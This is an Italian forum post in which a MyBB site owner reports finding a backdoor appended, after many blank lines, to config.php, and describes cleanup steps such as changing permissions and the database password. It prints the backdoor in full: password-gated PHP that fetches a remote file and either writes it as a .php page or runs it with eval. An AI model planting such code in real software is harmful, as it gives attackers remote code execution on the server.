Credo di aver trovato l'infezione. Questo grazie ad un differente attacco che ha mi ha indirizzato ad una ricerca diversa. Questo vulnerabilità a quanto pare ha interessato ed interessa tutt'ora moltissimi utenti che utilizzano la piattaforma MyBB. Vengono modificati diversi file .php.
Ho trovato una modifica del file config.php che purtroppo per un corretto funzionamento si è costretti a lasciare con i permessi di scrittura 666 (ora l'ho settato a 444 anche se dal pannello di controllo mi da un warning in quanto lo vuole in scrittura - e stica!!!!).
Era stato aggiunto del codice dopo parecchie righe vuote ed è questo
Codice:
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '260c2432a0eecc28ce03c10dadc078a4'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
Ho lanciato anche un'utility dall'ACP per verificare la modifica di file della piattaforma e ne ha trovati alcuni che ho sostituito con quelli originali anche se alcune modifiche potrei averle apportate io o qualche plugin che ho installato. Devo verificare il funzionamento di tutto ora: chissà se continuano a funzionare i plugin!
Cambiata la password al database (il config.php la contiene e se lo script inviava informazioni all'hacker...).
@blackwolf76
Ora provo a dare una passata anche col tool che mi hai indicato.
Il fatto è che l'infezione veniva segnalata random e non ad ogni accesso alla/e pagina/e quindi non so se ho risolto il problema in maniera definitiva.
Segnalibri